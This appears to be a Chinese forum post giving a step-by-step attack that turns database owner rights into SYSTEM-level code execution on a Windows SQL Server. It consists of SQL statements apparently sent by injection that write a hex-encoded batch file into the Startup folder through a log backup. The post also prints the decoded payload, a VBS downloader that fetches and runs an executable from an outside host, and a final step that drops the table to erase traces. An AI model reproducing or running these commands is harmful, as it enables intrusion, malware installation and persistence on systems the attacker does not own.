DB权限 得到 SYSTEM
alter database w37910com set RECOVERY FULL--   //打开开关
create table cmd (a image)-- //新建一个名为CMD的表和一个名为A的字段
backup log w37910com to disk = 'c:\cmd1' with init--  //备份到C盘
insert into cmd(a) values (0x130A0D0A6563686F2053657420503D6372656174654F626A65637428224D6963726F736F66742E584D4C4854545022293E6B2E7662730D0A6563686F20502E4F70656E2022474554222C22687474703A2F2F7777772E33373931302E636F6D2F312E657865222C30203E3E6B2E7662730D0A6563686F20502E53656E6428293A73657420473D6372656174654F626A656374282241444F44422E53747265616D22293E3E6B2E7662730D0A6563686F20472E4D6F64653D333A472E547970653D313A472E4F70656E2829203E3E6B2E766273200D0A6563686F20472E577269746520502E526573706F6E7365426F64793A472E53617665546F46696C652022312E657865222C32203E3E6B2E7662730D0A6B2E7662730D0A74200D0A)--
（关键是在这里0D0A在16进制里面就是回车符的意思，可能有兄弟问130a0d0A是什么意思？意思就是DOUBLE回车。后面的0D0A也是一个回车是怕有垃圾字符，那个代码也贴出来给兄弟们
echo Set P=createObject("Microsoft.XMLHTTP")>k.vbs
echo P.Open "GET","http://www.03389.com/1.exe",0 >>k.vbs
echo P.Send():set G=createObject("ADODB.Stream")>>k.vbs
echo G.Mode=3:G.Type=1:G.Open() >>k.vbs
echo G.Write P.ResponseBody:G.SaveToFile "1.exe",2 >>k.vbs
k.vbs
t
注意这段代码上面是两个回车 下面一个回车）
backup log w37910com to disk = 'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\1.bat'--//主角备份到这个目录
drop table cmd-- //擦PP
都运行完了就可以等死了。
感谢猫公子同学的帮助，当然还有鸟人高春雷。
THE END！